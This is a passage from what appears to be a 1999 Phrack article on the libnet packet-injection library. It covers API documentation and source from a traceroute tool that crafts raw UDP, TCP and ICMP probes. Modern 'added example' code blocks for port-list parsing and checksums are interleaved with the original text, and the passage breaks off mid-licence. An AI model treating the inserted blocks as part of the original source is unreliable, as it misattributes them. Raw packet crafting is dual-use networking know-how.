3 - byte swap flag
4 - previously opened stream to dump the packet to
libnet_hex_dump() prints out a packet in hexadecimal. It will print the
packet as it appears in memory, or as it will appear on the wire,
depending on the value of the byte-swap flag.
The function prints the packet to a previously opened stream (such as
stdout).
Note that on big-endian architectures such as Solaris, the packet will
appear the same in memory as it will on the wire.
int libnet_plist_chain_new(struct libnet_plist_chain **, char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to a libnet_plist_chain pointer
2 - pointer to the token list
libnet_plist_chain_new() constructs a new libnet port-list chain. A libnet
port-list chain is a fast and simple way of implementing port-list ranges
(useful for applications that employ a list of ports - like a port scanner).
You'll see naive implementations that allocate an entire array of 65535
bytes and fill in the desired ports one by one. However, we only really
need to store the beginning port and the ending port, and we can
efficiently store multiple port ranges (delimited by commas) by using a
linked list chain with each node holding the beginning and ending port for
a particular range. For example, the port range `1-1024` would occupy
one node with the beginning port being 1 and the ending port being 1024.
The port range `25,110-161,6000` would result in 3 nodes being allocated.
Single ports are taken as single ranges (port 25 ends up being 25-25).
A port list range without a terminating port (port_num - ) is
considered shorthand for (port_num - 65535).
The arguments are a pointer to a libnet_plist_chain pointer (which will end
up being the head of the linked list), which needs to dereference an
allocated libnet_plist_chain structure, and a pointer to the port-list
(token-list) itself.
The function checks this character port list for valid tokens
(1234567890,- ) and returns an error if an unrecognized token is
found.
Upon success the function returns 1, and head points to the newly formed
port-list (and also contains the number of nodes in the list). If an error
occurs (an unrecognized token is found or malloc fails) -1 is returned and
head is set to NULL.
libnet_plist_chain_next_pair() should be used to extract port list pairs.
int libnet_plist_chain_next_pair(struct libnet_plist_chain *, u_short *,
u_short *);
RV on success: 1, 0
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to a libnet_plist_chain pointer
2 - pointer to the beginning port (to be filled in)
3 - pointer to the ending port (to be filled in)
libnet_plist_chain_next_pair() fetches the next pair of ports from the
list. The function takes a pointer to the head of the prebuilt list and a
pointer to a u_short that will contain the beginning port and a pointer to
a u_short that will contain the ending port.
The function returns 1 and fills in these values if there are nodes
remaining, or if the port list chain is exhausted, it returns 0. If
an error occurs (the libnet_plist_chain pointer is NULL) the function
returns -1.
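The two functions above, reimplemented as an added example (not libnet's own code) so the parsing rules can be seen end to end: single ports become b-b nodes, a trailing `-` means up to 65535, and any character outside 0-9 , - and space, a port above 65535 or an inverted range makes the build fail with the head set to NULL. Names (plist, plist_new, plist_next_pair, plist_free) are this example's own.

```c
/* Added example, not libnet's implementation: a port-list chain parsed from
 * a token string such as "25,110-161,6000-" the way the page describes, and
 * a next-pair iterator over it. Names (plist, plist_new, plist_next_pair,
 * plist_free) are this example's own. */
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#define PORT_MAX 65535

struct plist_node {                 /* one range; a single port is b-b */
    unsigned short bport, eport;
    struct plist_node *next;
};

struct plist {
    struct plist_node *head, *cur;  /* cur: iterator position */
    int node_cnt;
};

void plist_free(struct plist *pl)
{
    struct plist_node *n, *next;
    if (pl == NULL) return;
    for (n = pl->head; n; n = next) { next = n->next; free(n); }
    free(pl);
}

/* Reads one decimal port at *s and advances past it. Returns -1 if no digit
 * is present or the value exceeds 65535. */
static int parse_port(const char **s)
{
    long v = 0;
    int digits = 0;
    for (; isdigit((unsigned char)**s); (*s)++, digits++) {
        v = v * 10 + (**s - '0');
        if (v > PORT_MAX) return -1;
    }
    return digits ? (int)v : -1;
}

/* Builds the chain. Returns 1 and sets *out on success; returns -1 with
 * *out = NULL on an unrecognized token, a port above 65535, an inverted or
 * empty range list, or malloc failure. Only 0-9 , - and space are accepted. */
int plist_new(struct plist **out, const char *tokens)
{
    struct plist *pl;
    struct plist_node **tail;
    const char *s = tokens;
    *out = NULL;
    if (tokens == NULL || strspn(tokens, "0123456789,- ") != strlen(tokens))
        return -1;
    if ((pl = calloc(1, sizeof *pl)) == NULL) return -1;
    tail = &pl->head;
    while (*s) {
        int b, e;
        struct plist_node *n;
        while (*s == ' ') s++;
        if ((b = parse_port(&s)) == -1) goto fail;
        e = b;                                      /* "25" means 25-25 */
        if (*s == '-') {
            s++;
            while (*s == ' ') s++;
            e = (*s == '\0' || *s == ',') ? PORT_MAX /* "6000-" shorthand */
                                          : parse_port(&s);
            if (e == -1 || e < b) goto fail;
        }
        while (*s == ' ') s++;
        if (*s == ',') s++;
        else if (*s != '\0') goto fail;
        if ((n = malloc(sizeof *n)) == NULL) goto fail;
        n->bport = (unsigned short)b;
        n->eport = (unsigned short)e;
        n->next = NULL;
        *tail = n;
        tail = &n->next;
        pl->node_cnt++;
    }
    if (pl->node_cnt == 0) goto fail;               /* nothing parsed */
    pl->cur = pl->head;
    *out = pl;
    return 1;
fail:
    plist_free(pl);
    return -1;
}

/* Fetches the next pair: 1 with *bport/*eport filled in, 0 once the chain
 * is exhausted, -1 if pl is NULL. */
int plist_next_pair(struct plist *pl, unsigned short *bport, unsigned short *eport)
{
    if (pl == NULL) return -1;
    if (pl->cur == NULL) return 0;
    *bport = pl->cur->bport;
    *eport = pl->cur->eport;
    pl->cur = pl->cur->next;
    return 1;
}
```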
int libnet_plist_chain_dump(struct libnet_plist_chain *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to a libnet_plist_chain pointer
libnet_plist_chain_dump() dumps the port-list chain referenced by the
argument. The function prints the list to stdout (it's mainly meant as a
debugging tool). It returns 1 upon success or if an error occurs (the
libnet_plist_chain pointer is NULL) the function returns -1.
u_char *libnet_plist_chain_dump_string(struct libnet_plist_chain *);
RV on success: pointer to the token list as a string
RV on failure: NULL
Reentrant: no
Arguments: 1 - pointer to a libnet_plist_chain pointer
libnet_plist_chain_dump_string() returns the port-list chain referenced by
the argument as a string. It returns the port list string upon success or
if an error occurs (the libnet_plist_chain pointer is NULL) the function
returns NULL.
void libnet_plist_chain_free(struct libnet_plist_chain *);
RV on success: NA
RV on failure: NA
Reentrant: yes
Arguments: 1 - pointer to a libnet_plist_chain pointer
libnet_plist_chain_free() frees the memory associated with the libnet
port list chain.
----[ 6] Conclusion
Libnet is a powerful and useful library. Use it well and you will prosper
and people will like you. Women will want you, men will want to be you (swap
genders as required).
----[ 7] URLs
Libnet Homepage: http://www.packetfactory.net/libnet
Libnet Project Page: http://www.packetfactory.net
Libnet Mailing List: libnet-subscribe@libnetdevel.com
(mailing list is, as of 09.09.99 down for unknown
reasons. It will be back up soon. Keep track of
it on the webpage.)
TracerX http://www.packetfactory.net/tracerx
----[ 8] References
[1] LBNL, Network Research Group, "libpcap", http://ee.lbl.gov
[2] Stevens, W. Richard, "UNIX Network Programming, vol. I, 2nd ed.",
Prentice Hall PTR, 1998
[3] Hanson, David R., "C Interfaces and Implementations", Addison-Wesley,
1997
----[ 9] Example code
No writ on a C library would be complete without C code. The following
heavily commented example is a work in progress. It's actually an
incomplete program that we were working on called tracerx (a planned
enhanced traceroute -- http://www.packetfactory.net/tracerx).
The packet injection portion is complete and operational and
should prove to be a good example of how to write reasonably complex code
on top of libnet (and libpcap). Included is the current tracerx tree,
including the autoconf files, so that you can build it on your machine
and play with it.
<++> P55/Tracerx/tx_framework.c !a2064076
/*
* $Id: tx_framework.c,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tx_framework.c - main tracerx toplevel routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_main.h"
#include "./tx_error.h"
#include "./tx_struct.h"
#include "./tx_framework.h"
#include "./tx_packet_inject.h"
#include "./tx_packet_capture.h"
#include "./tx_packet_filter.h"
int
tx_init_control(struct tx_control **tx_c)
{
/*
* Heap memory for the control structure.
*/
*tx_c = (struct tx_control *)malloc(sizeof(struct tx_control));
if (!(*tx_c))
{
return (-1);
}
if (libnet_seed_prand() == -1)
{
tx_error(CRITICAL, "Can't initialize the random number generator\n");
return (-1);
}
/*
* Initialize defaults to mimic a standard traceroute scan.
*/
(*tx_c)->device = NULL; /* set later */
(*tx_c)->current_ttl = 1; /* start at 1 hop */
(*tx_c)->max_ttl = 30; /* end at 30 */
(*tx_c)->initial_sport = libnet_get_prand(PRu16);
(*tx_c)->initial_dport = 32768 + 666; /* standard tr */
(*tx_c)->id = getpid(); /* packet id */
(*tx_c)->use_name = 1; /* resolve IP addresses */
(*tx_c)->packet_size = PACKET_MIN; /* IP + UDP + payload */
(*tx_c)->ip_tos = 0; /* set later */
(*tx_c)->ip_df = 0; /* set later */
(*tx_c)->packet_offset = 0; /* set later */
(*tx_c)->protocol = IPPROTO_UDP; /* UDP */
(*tx_c)->probe_cnt = 3; /* 3 probes */
(*tx_c)->verbose = 0; /* Sssssh */
(*tx_c)->reading_wait = 5; /* 5 seconds */
(*tx_c)->writing_pause = 0; /* no writing pause */
(*tx_c)->host = 0; /* set later */
(*tx_c)->packets_sent = 0; /* set later */
(*tx_c)->packets_reply = 0; /* set later */
(*tx_c)->l = NULL; /* libnet link interface, opened later */
(*tx_c)->p = NULL; /* pcap descriptor, opened later */
memset(&(*tx_c)->sin, 0, sizeof(struct sockaddr_in));
return (1);
}
int
tx_init_network(struct tx_control **tx_c, char *err_buf)
{
/*
* Set up the network interface and determine our outgoing IP address.
*/
if (libnet_select_device(&(*tx_c)->sin, &(*tx_c)->device, err_buf) == -1)
{
return (-1);
}
/*
* Open the libnet link-layer injection interface.
*/
(*tx_c)->l = libnet_open_link_interface((*tx_c)->device, err_buf);
if (!((*tx_c)->l))
{
return (-1);
}
/*
* Open the pcap packet capturing interface.
*/
(*tx_c)->p = pcap_open_live((*tx_c)->device, PCAP_BUFSIZ, 0, 500, err_buf);
if (!((*tx_c)->p))
{
return (-1);
}
/*
* Verify minimum packet size and set the pcap filter.
*/
switch ((*tx_c)->protocol)
{
case IPPROTO_UDP:
if ((*tx_c)->packet_size < IP_H + UDP_H + TX_P)
{
tx_error(WARNING,
"Packet size too small, adjusted from %d to %d\n",
(*tx_c)->packet_size,
IP_H + UDP_H + TX_P);
(*tx_c)->packet_size = IP_H + UDP_H + TX_P;
}
if (tx_set_pcap_filter(TX_BPF_FILTER_UDP, tx_c) == -1)
{
return (-1);
}
break;
case IPPROTO_TCP:
if ((*tx_c)->packet_size < IP_H + TCP_H + TX_P)
{
tx_error(WARNING,
"Packet size too small, adjusted from %d to %d\n",
(*tx_c)->packet_size,
IP_H + TCP_H + TX_P);
(*tx_c)->packet_size = IP_H + TCP_H + TX_P;
}
if (tx_set_pcap_filter(TX_BPF_FILTER_TCP, tx_c) == -1)
{
return (-1);
}
break;
case IPPROTO_ICMP:
if ((*tx_c)->packet_size < IP_H + ICMP_ECHO_H + TX_P)
{
tx_error(WARNING,
"Packet size too small, adjusted from %d to %d\n",
(*tx_c)->packet_size,
IP_H + ICMP_ECHO_H + TX_P);
(*tx_c)->packet_size = IP_H + ICMP_ECHO_H + TX_P;
}
if (tx_set_pcap_filter(TX_BPF_FILTER_ICMP, tx_c) == -1)
{
return (-1);
}
break;
default:
sprintf(err_buf, "Unknown protocol, can't set packetsize or filter\n");
return (-1);
}
/*
* Allocate packet header memory.
*/
if (libnet_init_packet(
(*tx_c)->packet_size + ETH_H, /* include space for link layer */
&(*tx_c)->tx_packet) == -1)
{
sprintf(err_buf, "libnet_init_packet: %s\n", strerror(errno));
return (-1);
}
return (1);
}
int
tx_do_scan(struct tx_control **tx_c)
{
int i, j;
/*
* Build a probe `template`. This template will be used for each
* probe sent and it will be updated each pass through the main loop.
*/
tx_packet_build_probe(tx_c);
/*
* Increment the hopcounter and update packet template.
*/
for (i = 0; i < (*tx_c)->max_ttl; i++)
{
/*
* Send a round of probes.
*/
for (j = 0; j < (*tx_c)->probe_cnt; j++)
{
tx_packet_inject(tx_c);
fprintf(stderr, ".");
}
tx_packet_update_probe(tx_c);
fprintf(stderr, "\n");
}
tx_error(FATAL, "Hopcount exceeded.\n");
return (1);
}
int
tx_shutdown(struct tx_control **tx_c)
{
pcap_close((*tx_c)->p);
libnet_close_link_interface((*tx_c)->l);
free((*tx_c)->l);
libnet_destroy_packet(&(*tx_c)->tx_packet);
free(*tx_c);
return (1);
}
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_build.c !3b3527d5
/*
* $Id: tx_packet_build.c,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tx_packet_build.c - tracerx packet construction routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_main.h"
#include "./tx_error.h"
#include "./tx_struct.h"
#include "./tx_framework.h"
#include "./tx_util.h"
#include "./tx_packet_build.h"
#include "./tx_packet_inject.h"
#include "./tx_packet_capture.h"

int
tx_packet_build_probe(struct tx_control **tx_c)
{
    int c;
    u_char errbuf[BUFSIZ];
    struct ether_addr *local_mac, *remote_mac;
    u_char DEBUG_ETHER[6] = {0x00, 0x10, 0x4b, 0x6b, 0x3c, 0x16};

    /*
     *  Get the link layer addresses we'll need -- the local address of the
     *  outgoing interface and remote address of the host in question (this
     *  will actually be the first hop router).
     */
    c = tx_get_hwaddrs(&local_mac, &remote_mac, tx_c, errbuf);
    if (c == -1)
    {
        tx_error(FATAL, "tx_get_hwaddrs could not get an address %s.\n",
                errbuf);
    }

    /*
     *  Build the ethernet header portion of the packet.  The destination
     *  is still the hardcoded DEBUG_ETHER address: tx_get_hwaddrs does not
     *  fill in remote_mac yet.
     */
    libnet_build_ethernet(DEBUG_ETHER/*remote_mac->ether_addr_octet*/,
            local_mac->ether_addr_octet,
            ETHERTYPE_IP,                   /* This is an IP packet */
            NULL,                           /* No payload */
            0,                              /* No payload */
            (*tx_c)->tx_packet);            /* packet memory */

    /*
     *  Build the IP header portion of the packet.
     */
    libnet_build_ip((*tx_c)->packet_size - IP_H, /* IP length sans IP header */
            (*tx_c)->ip_tos,                /* IP type of service */
            (*tx_c)->id,                    /* IP id */
            (*tx_c)->ip_df,                 /* IP fragmentation bits */
            (*tx_c)->current_ttl,           /* IP time to live */
            (*tx_c)->protocol,              /* transport protocol */
            (*tx_c)->sin.sin_addr.s_addr,   /* source IP address */
            (*tx_c)->host,                  /* destination IP */
            NULL,                           /* IP payload */
            0,                              /* IP payload size */
            (*tx_c)->tx_packet + ETH_H);    /* packet memory */

    /*
     *  Build the transport header and payload portion of the packet.
     */
    switch ((*tx_c)->protocol)
    {
        case IPPROTO_UDP:
            tx_packet_build_udp(tx_c);
            break;
        case IPPROTO_TCP:
            tx_packet_build_tcp(tx_c);
            break;
        case IPPROTO_ICMP:
            tx_packet_build_icmp(tx_c);
            break;
        default:
            tx_error(FATAL, "Unknown transport protocol\n");
    }
    libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_IP, IP_H);
    return (1);
}

int
tx_packet_build_udp(struct tx_control **tx_c)
{
    libnet_build_udp((*tx_c)->initial_sport,    /* source UDP port */
            (*tx_c)->initial_dport,             /* dest UDP port */
            NULL,                               /* payload (copied later) */
            /* The UDP header needs to know the payload size. */
            (*tx_c)->packet_size - IP_H - UDP_H,
            (*tx_c)->tx_packet + ETH_H + IP_H); /* packet memory */
    tx_packet_build_payload(tx_c, UDP_H);
    libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_UDP,
            (*tx_c)->packet_size - IP_H);
    return (1);
}

int
tx_packet_build_tcp(struct tx_control **tx_c)
{
    libnet_build_tcp((*tx_c)->initial_sport,    /* source TCP port */
            (*tx_c)->initial_dport,             /* dest TCP port */
            libnet_get_prand(PRu32),            /* sequence number */
            0L,                                 /* ACK number */
            TH_SYN,                             /* control flags */
            1024,                               /* window size */
            0,                                  /* urgent */
            NULL,                               /* payload (do this later) */
            0,                                  /* later */
            (*tx_c)->tx_packet + ETH_H + IP_H); /* packet memory */
    tx_packet_build_payload(tx_c, TCP_H);
    libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_TCP,
            (*tx_c)->packet_size - IP_H);
    return (1);
}

int
tx_packet_build_icmp(struct tx_control **tx_c)
{
    libnet_build_icmp_echo(ICMP_ECHO,           /* type */
            0,                                  /* code */
            0,                                  /* id */
            0,                                  /* sequence */
            NULL,                               /* payload (do this later) */
            0,                                  /* later */
            (*tx_c)->tx_packet + ETH_H + IP_H); /* packet memory */
    tx_packet_build_payload(tx_c, ICMP_ECHO_H);
    libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_ICMP,
            (*tx_c)->packet_size - IP_H);
    return (1);
}

int
tx_packet_build_payload(struct tx_control **tx_c, int p_hdr_size)
{
    struct timeval time0;
    struct tx_payload *p;
    struct libnet_ip_hdr *ip_hdr;
    int payload_offset;

    /*
     *  The payload is just beyond the transport header.
     */
    payload_offset = ETH_H + IP_H + p_hdr_size;

    if (gettimeofday(&time0, NULL) == -1)
    {
        tx_error(FATAL, "Can't get timing information\n");
    }
    ip_hdr = (struct libnet_ip_hdr *)((*tx_c)->tx_packet + ETH_H);
    p = (struct tx_payload *)((*tx_c)->tx_packet + payload_offset);

    /*
     *  This field is pretty much deprecated since we can keep track of
     *  packets by controlling the ip_id field, something traceroute could
     *  not do.
     */
    p->seq = 0;

    /*
     *  TTL packet left with.
     */
    p->ttl = ip_hdr->ip_ttl;

    /*
     *  RTT information.
     */
    p->tv = time0;
    return (1);
}

int
tx_packet_update_probe(struct tx_control **tx_c)
{
    struct libnet_ip_hdr *ip_hdr;

    ip_hdr = (struct libnet_ip_hdr *)((*tx_c)->tx_packet + ETH_H);

    /*
     *  Tracerx wouldn't be tracerx without a monotonically increasing IP
     *  TTL.
     */
    ip_hdr->ip_ttl++;

    switch ((*tx_c)->protocol)
    {
        case IPPROTO_TCP:
        {
            struct libnet_tcp_hdr *tcp_hdr;

            tcp_hdr = (struct libnet_tcp_hdr *)((*tx_c)->tx_packet + ETH_H
                    + IP_H);
            if (!((*tx_c)->tx_flags & TX_STATIC_PORTS))
            {
                /*
                 *  Increment destination port.
                 */
                tcp_hdr->th_dport = htons(ntohs(tcp_hdr->th_dport) + 1);
            }
            /*
             *  Update the payload information, then recompute the
             *  transport checksum from a cleared sum field.
             */
            tx_packet_build_payload(tx_c, TCP_H);
            tcp_hdr->th_sum = 0;
            libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_TCP,
                    (*tx_c)->packet_size - IP_H);
            break;
        }
        case IPPROTO_UDP:
        {
            struct libnet_udp_hdr *udp_hdr;

            udp_hdr = (struct libnet_udp_hdr *)((*tx_c)->tx_packet + ETH_H
                    + IP_H);
            if (!((*tx_c)->tx_flags & TX_STATIC_PORTS))
            {
                /*
                 *  Increment destination port.
                 */
                udp_hdr->uh_dport = htons(ntohs(udp_hdr->uh_dport) + 1);
            }
            /*
             *  Update the payload information, then recompute the
             *  transport checksum from a cleared sum field.
             */
            tx_packet_build_payload(tx_c, UDP_H);
            udp_hdr->uh_sum = 0;
            libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_UDP,
                    (*tx_c)->packet_size - IP_H);
            break;
        }
        case IPPROTO_ICMP:
        {
            struct libnet_icmp_hdr *icmp_hdr;

            icmp_hdr = (struct libnet_icmp_hdr *)((*tx_c)->tx_packet + ETH_H
                    + IP_H);
            /*
             *  Update the payload information, then recompute the
             *  ICMP checksum from a cleared sum field.
             */
            tx_packet_build_payload(tx_c, ICMP_ECHO_H);
            icmp_hdr->icmp_sum = 0;
            libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_ICMP,
                    (*tx_c)->packet_size - IP_H);
            break;
        }
        default:
            tx_error(FATAL, "Unknown transport protocol\n");
    }

    /*
     *  The TTL changed, so the IP header checksum has to be redone too.
     */
    ip_hdr->ip_sum = 0;
    libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_IP, IP_H);
    return (1);
}

/* EOF */
<-->
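The per-round update above (ip_ttl++, bump the port, clear ip_sum / th_sum / uh_sum, call libnet_do_checksum() again) only works because the sum field is zeroed before the sum is recomputed. The following is an added example, not Tracerx or libnet code, that does the IPv4 header checksum in plain C over a constructed header (TEST-NET addresses, id 0x4242) and shows the stale state the TTL bump leaves behind until the sum is refreshed; ip_checksum, ip_fix_checksum, build_probe_header and the other names are this example's own. It also recomputes the commonly quoted example header (192.168.0.1 to 192.168.0.199, UDP, total length 115) whose checksum is 0xb861, as a check on the implementation itself.

```c
/* Added example (not Tracerx or libnet code): IPv4 header checksum upkeep
 * over a constructed header.  Addresses are from the TEST-NET ranges. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define IPV4_HDR_LEN 20

/* RFC 1071: ones' complement of the 16-bit ones' complement sum of the
 * data; an odd trailing byte is padded with zero. */
static uint16_t ip_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;

    for (; len > 1; len -= 2, data += 2)
    {
        sum += (uint32_t)((data[0] << 8) | data[1]);
    }
    if (len == 1)
    {
        sum += (uint32_t)(data[0] << 8);
    }
    while (sum >> 16)                       /* fold the carries back in */
    {
        sum = (sum & 0xffff) + (sum >> 16);
    }
    return (uint16_t)~sum;
}

/* What libnet_do_checksum(..., IPPROTO_IP, IP_H) amounts to once the caller
 * has cleared ip_sum: sum the 20 byte header, store big endian. */
static void ip_fix_checksum(uint8_t *hdr)
{
    uint16_t sum;

    hdr[10] = 0;
    hdr[11] = 0;
    sum = ip_checksum(hdr, IPV4_HDR_LEN);
    hdr[10] = (uint8_t)(sum >> 8);
    hdr[11] = (uint8_t)(sum & 0xff);
}

/* A receiver accepts the header when the sum over all of it, checksum
 * field included, comes out as zero. */
static int ip_checksum_ok(const uint8_t *hdr)
{
    return ip_checksum(hdr, IPV4_HDR_LEN) == 0;
}

/* Constructed probe header: 60 byte UDP datagram, id 0x4242, DF set. */
static void build_probe_header(uint8_t *hdr, uint8_t ttl)
{
    static const uint8_t tmpl[IPV4_HDR_LEN] = {
        0x45, 0x00, 0x00, 0x3c,     /* IPv4, IHL 5, TOS 0, total length 60 */
        0x42, 0x42, 0x40, 0x00,     /* id 0x4242, DF, fragment offset 0 */
        0x00, 0x11, 0x00, 0x00,     /* TTL (set below), UDP, checksum 0 */
        192, 0, 2, 1,               /* source 192.0.2.1 (TEST-NET-1) */
        198, 51, 100, 9             /* destination 198.51.100.9 (TEST-NET-2) */
    };

    memcpy(hdr, tmpl, IPV4_HDR_LEN);
    hdr[8] = ttl;
    ip_fix_checksum(hdr);
}

/* The edit tx_packet_update_probe makes each round: ip_ttl++.  Returns 1
 * only if the old checksum is now stale (adding 1 to the TTL byte adds
 * 0x0100 to the sum) and the refreshed one verifies again. */
static int bump_ttl_and_refresh(uint8_t *hdr)
{
    int stale;

    hdr[8]++;                           /* ip_hdr->ip_ttl++ */
    stale = !ip_checksum_ok(hdr);       /* a router would drop this as is */
    ip_fix_checksum(hdr);               /* ip_sum = 0; libnet_do_checksum() */
    return stale && ip_checksum_ok(hdr);
}

/* The commonly quoted example header (192.168.0.1 -> 192.168.0.199, UDP,
 * total length 115) has checksum 0xb861; recomputing it checks ip_checksum. */
static uint16_t known_vector_checksum(void)
{
    uint8_t hdr[IPV4_HDR_LEN] = {
        0x45, 0x00, 0x00, 0x73, 0x00, 0x00, 0x40, 0x00, 0x40, 0x11,
        0x00, 0x00, 0xc0, 0xa8, 0x00, 0x01, 0xc0, 0xa8, 0x00, 0xc7 };
    return ip_checksum(hdr, IPV4_HDR_LEN);
}

/* Whole round trip: build at TTL 1, bump to 2, refresh.  1 on success. */
static int checksum_roundtrip(void)
{
    uint8_t hdr[IPV4_HDR_LEN];

    build_probe_header(hdr, 1);
    if (!ip_checksum_ok(hdr) || !bump_ttl_and_refresh(hdr))
    {
        return 0;
    }
    return hdr[8] == 2 && ip_checksum_ok(hdr);
}

int main(void)
{
    printf("known vector: 0x%04x\n", known_vector_checksum());
    printf("roundtrip: %s\n", checksum_roundtrip() ? "ok" : "FAILED");
    return 0;
}
```

The same zero-then-recompute rule applies to the transport checksums, with the extra wrinkle that TCP and UDP sums cover a pseudo-header built from the IP addresses, so a changed port or payload needs the recomputation just as much as a changed TTL needs the IP one.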
<++> P55/Tracerx/tx_packet_inject.c !788114b0
/*
* $Id: tx_packet_inject.c,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tx_packet_inject.c - high-level packet injection routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_struct.h"
#include "./tx_framework.h"
#include "./tx_error.h"
#include "./tx_packet_inject.h"

int
tx_packet_inject(struct tx_control **tx_c)
{
    int n;

    n = libnet_write_link_layer(
            (*tx_c)->l,                     /* pointer to the link interface */
            (*tx_c)->device,                /* the device to use */
            (*tx_c)->tx_packet,             /* the packet to inject */
            (*tx_c)->packet_size + ETH_H);  /* total packet size */
    if (n != (*tx_c)->packet_size + ETH_H)
    {
        tx_error(CRITICAL, "Write error.  Only wrote %d bytes\n", n);
        return (-1);
    }
    return (1);
}

/* EOF */
<-->
<++> P55/Tracerx/tx_packet_verify.c !7f21675e
/*
* $Id$
*
* Tracerx
* tx_packet_verify.c - packet verification routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
